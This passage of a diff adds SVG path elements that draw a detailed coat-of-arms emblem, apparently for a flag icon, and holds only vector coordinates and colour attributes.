2.2-2 2.5zm-17.2 0v3.4h-1.7v-3.4a2.7 2.7 0 0 1-1.8-1.7h-4.3v-1.7h4.3a2.8 2.8 0 0 1 2.6-1.8c1.3 0 2.3.8 2.7 1.8h4.3v1.7h-4.3a2.7 2.7 0 0 1-1.7 1.7zm9.5 36a16.8 16.8 0 0 1-5.2 2.8l-.4-1.7a14.6 14.6 0 0 0 4.3-2.1l1.3 1m.9 1.6a18.6 18.6 0 0 1-5.2 2.7l1.3 1.3a20 20 0 0 0 4.3-2.2l-.4-1.8M263.5 302l-1.8.5v4.6l1.8.5V302m1.8 0 1.8.5v4.6l-1.8.5V302m32.5 0-1.8.5v4.6l1.8.5V302"/>
+  <path fill="none" stroke="#c8b100" stroke-width=".3" d="m299.6 302 1.8.5v4.6l-1.8.5V302m-9.2 23.4-1.7.8-3.1-3.5 1-1.5 3.8 4.2m1.3-1 1-1.5-3-3.5-1.8.7 3.8 4.3m-19.4-21.5 1.7-.7 3.1 3.5-1 1.5-3.8-4.3M271 304l-1 1.5 3 3.5 1.8-.8-3.8-4.2m19.7-1.2-1.8-.7-3 3.5 1 1.5 3.8-4.3m1.3 1 1 1.5-3 3.5-1.8-.7 3.8-4.2m-21.7 9.6.5-1.7h4.8l.6 1.7h-5.9m0 1.6.5 1.7h4.8l.6-1.7h-5.9m-7-19.7c0-.7.5-1.2 1.1-1.2.7 0 1.2.5 1.2 1.2s-.5 1.1-1.2 1.1c-.6 0-1.2-.5-1.2-1.1zm12.8.8-.5 1.7h-4.8l-.5-1.7h5.8m0-1.7-.5-1.7h-4.8l-.5 1.7h5.8m21.4 19.8c0-.6.5-1.2 1.2-1.2s1.2.5 1.2 1.2c0 .6-.5 1.1-1.2 1.1s-1.2-.5-1.2-1.1zm-4.7-.8-.5-1.7h-4.8l-.5 1.7h5.9m0 1.6-.6 1.7h-4.8l-.5-1.7h5.9m-12.4 23.3c0-.6.5-1.1 1.2-1.1.6 0 1.1.5 1.1 1.1 0 .7-.5 1.2-1.2 1.2s-1.2-.5-1.2-1.2zm2-8.2 1.8-.5V325l-1.8-.5v5.6m-1.8 0-1.8-.5V325l1.8-.5v5.6m16.8-34.8c0-.7.6-1.2 1.2-1.2.7 0 1.2.5 1.2 1.2s-.5 1.1-1.2 1.1c-.6 0-1.2-.5-1.2-1.1zm-17.2 0c0-.7.6-1.2 1.2-1.2.7 0 1.2.5 1.2 1.2s-.5 1.1-1.2 1.1c-.6 0-1.2-.5-1.2-1.1zm6.7.8.6 1.7h4.8l.5-1.7H287m0-1.7.6-1.7h4.8l.5 1.7H287m-6.3 5.4-1.8.5v4.5l1.8.5V300m1.7 0 1.8.5v4.5l-1.8.5V300"/>
+  <path fill="#058e6e" d="M278.8 314.3a2.7 2.7 0 0 1 2.8-2.6c1.6 0 2.8 1.1 2.8 2.6a2.7 2.7 0 0 1-2.8 2.7 2.7 2.7 0 0 1-2.8-2.7"/>
+  <path fill="#db4446" d="M282.3 245v-.6l.1-.4s-1.6.2-2.5 0a6.3 6.3 0 0 1-2.5-1.4c-.8-.7-1.1-1-1.7-1.2-1.4-.2-2.4.4-2.4.4s1 .4 1.8 1.4a5 5 0 0 0 2 1.5c.6.2 2.7 0 3.3.1l1.9.2"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M282.3 245v-.6l.1-.4s-1.6.2-2.5 0a6.3 6.3 0 0 1-2.5-1.4c-.8-.7-1.1-1-1.7-1.2-1.4-.2-2.4.4-2.4.4s1 .4 1.8 1.4a5 5 0 0 0 2 1.5c.6.2 2.7 0 3.3.1l1.9.2z"/>
+  <path fill="#ed72aa" stroke="#000" stroke-width=".4" d="M290 242.7v1.4c.1.7-.2 1.3 0 1.7l.2 1c.2.2.3.9.3.9l-.8-.6-.6-.4v1c.1.3.3 1 .6 1.3.3.3.9 1 1 1.4.3.4.2 1.4.2 1.4s-.4-.7-.9-.9l-1.3-.6s.9.8.9 1.6c0 .7-.4 1.6-.4 1.6s-.3-.7-.8-1.1l-1.2-1s.5 1.2.5 2v2.6s-.5-.7-1-1l-1-.8c0-.2.5.7.6 1.2 0 .5.3 2.4 2 4.8 1 1.4 2.4 3.8 5.6 3 3.2-.8 2-5 1.3-7-.6-2-1-4.3-1-5 .1-.8.7-3 .6-3.5a8.5 8.5 0 0 1 .1-3.4c.4-1.3.8-1.9 1-2.4l.5-1.4v-1.4l.8 1.5.1 1.5s.1-1.1 1-1.7c1-.6 2-1.2 2.2-1.5l.4-.5s-.1 2-.7 2.7l-1.8 2.2s.8-.3 1.3-.3h.9s-.7.5-1.5 1.6c-.8 1.2-.5 1.3-1 2.3-.7 1-1.1 1-1.9 1.6-1 1-.5 4.5-.3 5 .1.5 2 4.9 2 6 .1 1 .3 3.3-1.6 4.9-1.2 1-3.1 1-3.6 1.2-.4.3-1.3 1.2-1.3 3s.7 2.1 1.2 2.6c.5.4 1.2.2 1.3.5l.5.8c.2.2.4.5.3.8 0 .4-1 1.3-1.2 2-.3.6-1 2.2-1 2.5 0 .2 0 1 .3 1.4 0 0 .9 1 .2 1.3-.4.1-.8-.3-1-.2l-1 .4c-.3 0-.3-.2-.4-.8l-.1-.7c-.3 0-.4.2-.4.5 0 .2 0 .9-.3.9s-.6-.5-.9-.6c-.2 0-.8-.2-.9-.5 0-.3.4-.9.8-1 .4 0 .8-.3.5-.5-.2-.2-.5-.2-.7 0s-.8 0-.8-.3.1-.7 0-.8c0-.2-.4-.6.2-.9.6-.3.8.3 1.4.2.6-.1 1-.3 1.1-.7.2-.3.2-1-.2-1.5s-.8-.5-1-.8l-.3-1v2.4l-.8-.9c-.3-.3-.6-1.4-.6-1.4v1.4c0 .4.4.7.2.9-.1.1-.8-.8-1-.9-.2-.1-.8-.6-1-1l-.6-1.5c0-.2-.2-1.4 0-1.6l.4-1.2h-1.4c-.8 0-1.3-.2-1.6.3-.3.5-.2 1.6.2 3 .4 1.3.6 2 .5 2.2a4 4 0 0 1-.8 1l-1-.1c-.2-.1-.5-.3-1.2-.3h-1.4c-.3 0-1-.4-1.2-.3-.3 0-.8.3-.7.7.2.6-.2.8-.5.7l-1-.2c-.3-.1-.9 0-.8-.4 0-.5.2-.5.4-.8.2-.3.3-.5 0-.5h-.7c-.2.2-.5.6-.7.5-.3-.2-.5-.5-.5-1.1 0-.7-.7-1.3 0-1.3.6 0 1.4.5 1.5.2.2-.4 0-.5-.3-.8-.3-.3-.7-.5-.3-.8l.8-.6c.2-.1.4-.8.7-.6.7.3 0 .7.7 1.4.6.7 1 1 2.1.9 1-.1 1.4-.3 1.4-.6l-.2-1 .2-1s-.5.3-.6.6l-.5.8v-2.1l-.2-.9-.3 1-.1 1s-.7-.5-.5-1.5v-2.1c.3-.4.9-1.7 2.2-1.8h2.8l2.1-.3s-3-1.5-3.7-2c-.7-.5-1.8-1.7-2.1-2.2-.4-.6-.7-1.6-.7-1.6s-.5 0-1 .3a5.3 5.3 0 0 0-1.3 1l-.7 1v-2s-.4 1.3-1 1.8l-1.5 1.2v-1l.2-1s-.5.8-1.2 1-1.9 0-2 .5c0 .5.2 1.1 0 1.4-.1.4-.5.6-.5.6s-.4-.4-.8-.4-.7.2-.7.2-.4-.4-.2-.7c0-.3.7-.7.5-.9-.1-.1-.6.1-.9.2-.3.2-.9.3-.8-.2 0-.4.2-.7 0-1-.1-.3 0-.6.2-.6.2-.1 1.2 0 1.3-.2 0-.3-.3-.5-.9-.7-.6-.1-.9-.5-.6-.8l.6-.6c.1-.3.2-.8.7-.6.6.3.5.9 1 1 .6.3 2 0 2.3-.1l1.5-1 1.7-1.2-1.1-.8-1-1.1a8.8 8.8 0 0 0-2-.7c-.5 0-1.8-.5-1.8-.5l.8-.3c.2-.2.7-.6.9-.6h.3-1.5c-.3-.2-1-.6-1.3-.6h-.9s.8-.4 1.4-.5l1.2-.1s-1-.3-1.3-.6l-.6-1c-.2-.2-.3-.6-.6-.6s-.9.4-1.2.3c-.3 0-.5-.2-.6-.7v-.5c-.2-.3-.7-.8-.2-1h1.4c.1-.2-.5-.7-.8-1-.4-.1-1-.4-.7-.7l.8-.6c.2-.3.4-1 .8-.7.3.2.9 1.3 1.1 1.2.3-.1.4-.9.3-1.2 0-.3 0-1 .3-.9.3 0 .5.5 1 .5.4 0 1.1-.1 1 .2 0 .4-.3.8-.6 1.1a1.6 1.6 0 0 0-.2 1.6 4 4 0 0 0 1.2 1.5c.4.3 1.3.5 1.8.8.6.4 1.9 1.4 2.3 1.5l.9.3s.5-.2 1.1-.2c.7 0 2.2.1 2.8-.1.6-.3 1.3-.7 1.1-1.2-.2-.5-1.5-1-1.4-1.4.1-.4.6-.4 1.4-.5.8 0 1.8.2 2-1 .2-1 .3-1.6-.8-1.9-1.1-.2-2-.3-2.1-1-.2-.8-.4-1-.2-1.3.2-.2.6-.3 1.5-.3.8-.1 1.7-.1 2-.3.2-.2.3-.7.6-1l1.5-.3s1.5.7 3 1.7c1.2 1 2.3 2.3 2.3 2.3"/>
+  <path d="m279.3 242-.2-.7-.1-.3s.9 0 .9.2c0 .3-.3.3-.4.4 0 .2-.2.3-.2.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m279.3 242-.2-.7-.1-.3s.9 0 .9.2c0 .3-.3.3-.4.4 0 .2-.2.3-.2.3z"/>
+  <path d="M283.4 240.5v-.5s.7 0 1.1.3c.6.4 1 1 1 1-.2.2-.6-.2-1-.3h-.4c-.2 0-.3 0-.4-.2v-.3h-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="M283.4 240.5v-.5s.7 0 1.1.3c.6.4 1 1 1 1-.2.2-.6-.2-1-.3h-.4c-.2 0-.3 0-.4-.2v-.3h-.3z"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m289 246.7-.4-.7a8 8 0 0 1-.2-.5"/>
+  <path fill="#db4446" d="M267.9 241.8s.5.3.8.3l.9.1s.2-.5.1-1c-.2-1.2-1.3-1.4-1.3-1.4s.3.7.1 1c-.2.6-.6 1-.6 1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M267.9 241.8s.5.3.8.3l.9.1s.2-.5.1-1c-.2-1.2-1.3-1.4-1.3-1.4s.3.7.1 1c-.2.6-.6 1-.6 1z"/>
+  <path fill="#db4446" d="M265.5 242.8s-.4-.8-1.3-.7c-1 .1-1.6.9-1.6.9h1.3c.4.3.5 1 .5 1l.7-.6.4-.6"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M265.5 242.8s-.4-.8-1.3-.7c-1 .1-1.6.9-1.6.9h1.3c.4.3.5 1 .5 1l.7-.6.4-.6z"/>
+  <path fill="#db4446" d="M264.4 246s-.8.1-1.2.6c-.5.5-.4 1.5-.4 1.5s.5-.6 1-.6l1.2.2-.3-.9c0-.3-.3-.8-.3-.8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M264.4 246s-.8.1-1.2.6c-.5.5-.4 1.5-.4 1.5s.5-.6 1-.6l1.2.2-.3-.9c0-.3-.3-.8-.3-.8z"/>
+  <path d="m279.3 245.9.4-.5.3.5h-.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m279.3 245.9.4-.5.3.5h-.7"/>
+  <path d="m280.2 245.9.4-.6.4.5h-.8"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m280.2 245.9.4-.6.4.5h-.8"/>
+  <path d="m279.8 242.5.8.3-.7.4-.1-.7"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m279.8 242.5.8.3-.7.4-.1-.7"/>
+  <path d="m280.8 242.8.8.2-.6.4-.2-.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m280.8 242.8.8.2-.6.4-.2-.6"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M275.2 249.2s-.9.3-1.2.7c-.3.6-.3 1.1-.3 1.1s.7-.6 1.6-.3l1.3.3c.4 0 1.3-.4 1.3-.4s-.7.9-.6 1.5c0 .6.2.9.1 1.2 0 .7-.5 1.6-.5 1.6l1-.3a4.9 4.9 0 0 0 1.8-.9l1-1s-.2 1 0 1.5l.2 1.7s.4-.5.8-.7c.2 0 .8-.4 1-.7l.3-1s0 .8.4 1.3c.3.4.7 1.8.7 1.8s.3-.9.6-1.3c.3-.3.7-.8.7-1v-1l.4 1m-11.7.6s.5-.9 1-1.2l1.2-.8 1-.4m1 5.3 1.4-.8a4.2 4.2 0 0 0 1.2-1.2"/>
+  <path fill="#db4446" d="M267 256.4s-.4-.5-1.2-.3c-.7 0-1.2 1-1.2 1l1-.2c.4.2.6.5.6.5l.5-.4.3-.6"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M267 256.4s-.4-.5-1.2-.3c-.7 0-1.2 1-1.2 1l1-.2c.4.2.6.5.6.5l.5-.4.3-.6z"/>
+  <path fill="#db4446" d="M266.2 259.4s-.7 0-1.2.4c-.6.4-.6 1.2-.6 1.2s.5-.4 1-.3l.8.2.1-.6c.1-.4-.1-.9-.1-.9"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M266.2 259.4s-.7 0-1.2.4c-.6.4-.6 1.2-.6 1.2s.5-.4 1-.3l.8.2.1-.6c.1-.4-.1-.9-.1-.9z"/>
+  <path fill="#db4446" d="M267.6 262.2s0 .8.4 1.3c.4.6 1.2.6 1.2.6l-.3-.8c-.1-.4.3-.7.3-.7s-.4-.4-.7-.4h-.8"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M267.6 262.2s0 .8.4 1.3c.4.6 1.2.6 1.2.6l-.3-.8c-.1-.4.3-.7.3-.7s-.4-.4-.7-.4h-.8zm17.1 1.4s2.1 1.3 2 2.4c0 1-1.1 2.4-1.1 2.4"/>
+  <path fill="#db4446" d="M275.2 269.4s-.5-.6-1.3-.6c-.7 0-1.5.7-1.5.7s1 0 1.2.2l.4.7.6-.3.6-.7"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M275.2 269.4s-.5-.6-1.3-.6c-.7 0-1.5.7-1.5.7s1 0 1.2.2l.4.7.6-.3.6-.7z"/>
+  <path fill="#db4446" d="M273 272.3s-1-.1-1.5.4-.4 1.4-.4 1.4.6-.7 1-.6c.6 0 1.2.3 1.2.3l-.2-.8a14 14 0 0 0-.2-.7"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M273 272.3s-1-.1-1.5.4-.4 1.4-.4 1.4.6-.7 1-.6c.6 0 1.2.3 1.2.3l-.2-.8a14 14 0 0 0-.2-.7z"/>
+  <path fill="#db4446" d="M275 275.4s-.5.6-.1 1.1c.3.6 1 .8 1 .8s-.2-.4-.1-.8.7-.8.7-.8l-1.5-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M275 275.4s-.5.6-.1 1.1c.3.6 1 .8 1 .8s-.2-.4-.1-.8.7-.8.7-.8l-1.5-.3z"/>
+  <path fill="#db4446" d="M287.7 276.6s-.8-.2-1.3 0c-.5.3-.8 1.5-.8 1.5s.7-.6 1.3-.6l1 .3v-.8a2.8 2.8 0 0 0-.2-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M287.7 276.6s-.8-.2-1.3 0c-.5.3-.8 1.5-.8 1.5s.7-.6 1.3-.6l1 .3v-.8a2.8 2.8 0 0 0-.2-.4z"/>
+  <path fill="#db4446" d="M288.1 279.7s-.6.6-.4 1.2a7.3 7.3 0 0 0 .6 1s0-.7.3-1c.3-.3 1-.3 1-.3l-.7-.6-.8-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M288.1 279.7s-.6.6-.4 1.2a7.3 7.3 0 0 0 .6 1s0-.7.3-1c.3-.3 1-.3 1-.3l-.7-.6-.8-.3z"/>
+  <path fill="#db4446" d="M291.3 280.6s-.3.8.3 1.3c.6.6 1.1.6 1.1.6s-.5-.8-.3-1.3c.1-.4.5-.7.5-.7l-.8-.2-.8.3"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M291.3 280.6s-.3.8.3 1.3c.6.6 1.1.6 1.1.6s-.5-.8-.3-1.3c.1-.4.5-.7.5-.7l-.8-.2-.8.3z"/>
+  <path fill="#ffd691" stroke="#000" stroke-width=".5" d="M258.7 337.5c2.1.6 3.2 2.2 3.2 4 0 2.5-2.3 4.3-5.4 4.3-3 0-5.6-1.8-5.6-4.2 0-1.9 1-4 3.2-4 0 0 0-.3-.3-.6l-.6-.7h1.3l.7.5.6-.7c.3-.4.7-.6.7-.6l.6.7.3.6s.4-.4.8-.5l.9-.3-.3.7-.1.8"/>
+  <path fill="#058e6e" stroke="#000" stroke-width=".5" d="M256 348.5s-4-2.8-5.8-3.1c-2.3-.5-4.8-.1-5.9-.2l1.9 1.5a11 11 0 0 0 3.5 2c3.3.8 6.3-.2 6.3-.2m1.2.2s2.6-2.7 5.3-3c3.3-.5 5.4.2 6.6.5 0 0-1 .5-1.6 1-.5.3-2 1.5-4.2 1.6-2.2 0-4.7-.3-5.1-.2l-1 .1"/>
+  <path fill="#ad1519" stroke="#000" stroke-width=".5" d="M256.4 345.4a5.2 5.2 0 0 1 0-7.6 5.2 5.2 0 0 1 1.7 3.8 5.2 5.2 0 0 1-1.7 3.8"/>
+  <path fill="#058e6e" stroke="#000" stroke-width=".5" d="M255.4 351s.6-1.6.7-3l-.2-2.2h.8s.4 1.2.4 2.2l-.2 2.5-.7.1-.8.3"/>
+  <path fill="#fff" d="M307 203.4c0-.6.4-1 1-1 .7 0 1.2.4 1.2 1s-.5 1.1-1.2 1.1a1 1 0 0 1-1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M307 203.4c0-.6.4-1 1-1 .7 0 1.2.4 1.2 1s-.5 1.1-1.2 1.1a1 1 0 0 1-1-1z"/>
+  <path fill="#fff" d="M308.4 200.7c0-.6.6-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M308.4 200.7c0-.6.6-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M309.5 197.6c0-.6.5-1 1-1a1 1 0 0 1 1.2 1c0 .6-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M309.5 197.6c0-.6.5-1 1-1a1 1 0 0 1 1.2 1c0 .6-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M309.6 194.2c0-.6.5-1 1.1-1a1 1 0 0 1 1.1 1c0 .6-.5 1-1 1-.7 0-1.2-.4-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M309.6 194.2c0-.6.5-1 1.1-1a1 1 0 0 1 1.1 1c0 .6-.5 1-1 1-.7 0-1.2-.4-1.2-1z"/>
+  <path fill="#fff" d="M308.8 190.9c0-.6.5-1 1-1a1 1 0 0 1 1.2 1c0 .6-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M308.8 190.9c0-.6.5-1 1-1a1 1 0 0 1 1.2 1c0 .6-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M307 187.8c0-.5.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1.1-1 1.1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M307 187.8c0-.5.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1.1-1 1.1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M304.7 185.4c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .5-.4 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M304.7 185.4c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .5-.4 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M302 183.3c0-.6.6-1 1.2-1s1.1.4 1.1 1-.5 1-1.1 1a1 1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M302 183.3c0-.6.6-1 1.2-1s1.1.4 1.1 1-.5 1-1.1 1a1 1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M298.9 181.6c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M298.9 181.6c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M295.5 180.4c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M295.5 180.4c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M291.8 179.8c0-.6.5-1.1 1.1-1.1.7 0 1.2.5 1.2 1 0 .7-.5 1.1-1.2 1.1a1.1 1.1 0 0 1-1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M291.8 179.8c0-.6.5-1.1 1.1-1.1.7 0 1.2.5 1.2 1 0 .7-.5 1.1-1.2 1.1a1.1 1.1 0 0 1-1-1z"/>
+  <path fill="#fff" d="M288.3 179.6c0-.6.5-1 1.1-1a1 1 0 0 1 1.2 1c0 .6-.5 1-1.2 1a1.1 1.1 0 0 1-1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M288.3 179.6c0-.6.5-1 1.1-1a1 1 0 0 1 1.2 1c0 .6-.5 1-1.2 1a1.1 1.1 0 0 1-1-1z"/>
+  <path fill="#fff" d="M284.9 179.7c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M284.9 179.7c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M281.4 179.7c0-.6.5-1 1.1-1 .6 0 1.1.4 1.1 1s-.5 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M281.4 179.7c0-.6.5-1 1.1-1 .6 0 1.1.4 1.1 1s-.5 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" stroke="#000" stroke-width=".4" d="M283.1 182.7c0-.6.5-1.1 1.1-1.1.7 0 1.2.5 1.2 1 0 .6-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.2-1m.7 3.2c0-.6.5-1 1.2-1 .6 0 1 .4 1 1s-.4 1-1 1a1.1 1.1 0 0 1-1.2-1m.2 3.3c0-.6.5-1 1-1a1 1 0 0 1 1.2 1c0 .6-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1m-1 3c0-.6.4-1.1 1-1.1a1 1 0 0 1 1.2 1c0 .7-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.2-1m-1.9 2.7c0-.6.5-1 1.2-1 .6 0 1 .4 1 1s-.4 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="#fff" d="M278.8 177.6c0-.5.5-1 1.1-1 .6 0 1.1.4 1.1 1s-.5 1.1-1 1.1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M278.8 177.6c0-.5.5-1 1.1-1 .6 0 1.1.4 1.1 1s-.5 1.1-1 1.1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M275.7 176c0-.7.5-1.1 1.1-1.1.7 0 1.2.4 1.2 1s-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M275.7 176c0-.7.5-1.1 1.1-1.1.7 0 1.2.4 1.2 1s-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M272.3 175c0-.7.5-1.1 1.2-1.1.6 0 1 .4 1 1s-.4 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M272.3 175c0-.7.5-1.1 1.2-1.1.6 0 1 .4 1 1s-.4 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M268.8 174.3c0-.6.5-1 1.1-1 .7 0 1.2.4 1.2 1s-.5 1-1.2 1a1.1 1.1 0 0 1-1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M268.8 174.3c0-.6.5-1 1.1-1 .7 0 1.2.4 1.2 1s-.5 1-1.2 1a1.1 1.1 0 0 1-1-1z"/>
+  <path fill="#fff" d="M265.4 174.4c0-.6.5-1 1.1-1 .6 0 1.1.4 1.1 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M265.4 174.4c0-.6.5-1 1.1-1 .6 0 1.1.4 1.1 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M261.8 175c0-.6.5-1 1.1-1a1 1 0 0 1 1.1 1c0 .6-.5 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M261.8 175c0-.6.5-1 1.1-1a1 1 0 0 1 1.1 1c0 .6-.5 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M258.5 176.1c0-.6.5-1 1.1-1 .6 0 1.1.4 1.1 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M258.5 176.1c0-.6.5-1 1.1-1 .6 0 1.1.4 1.1 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M202.3 203.4c0-.6.5-1 1.1-1a1 1 0 0 1 1.1 1c0 .6-.5 1.1-1 1.1a1 1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M202.3 203.4c0-.6.5-1 1.1-1a1 1 0 0 1 1.1 1c0 .6-.5 1.1-1 1.1a1 1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M200.8 200.7c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1 1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M200.8 200.7c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1 1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M199.7 197.6c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M199.7 197.6c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M199.6 194.2c0-.6.5-1 1.1-1 .7 0 1.2.4 1.2 1s-.5 1-1.2 1c-.6 0-1-.4-1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M199.6 194.2c0-.6.5-1 1.1-1 .7 0 1.2.4 1.2 1s-.5 1-1.2 1c-.6 0-1-.4-1-1z"/>
+  <path fill="#fff" d="M200.4 190.9c0-.6.5-1 1.2-1 .6 0 1 .4 1 1s-.4 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M200.4 190.9c0-.6.5-1 1.2-1 .6 0 1 .4 1 1s-.4 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M202.2 187.8c0-.5.5-1 1-1a1 1 0 0 1 1.2 1c0 .6-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M202.2 187.8c0-.5.5-1 1-1a1 1 0 0 1 1.2 1c0 .6-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M204.5 185.4c0-.6.5-1 1.1-1 .6 0 1.1.4 1.1 1 0 .5-.5 1-1.1 1-.6 0-1.1-.4-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M204.5 185.4c0-.6.5-1 1.1-1 .6 0 1.1.4 1.1 1 0 .5-.5 1-1.1 1-.6 0-1.1-.4-1.1-1z"/>
+  <path fill="#fff" d="M207.2 183.3c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1 1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M207.2 183.3c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1 1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M210.3 181.6c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M210.3 181.6c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M213.7 180.4c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1"/>
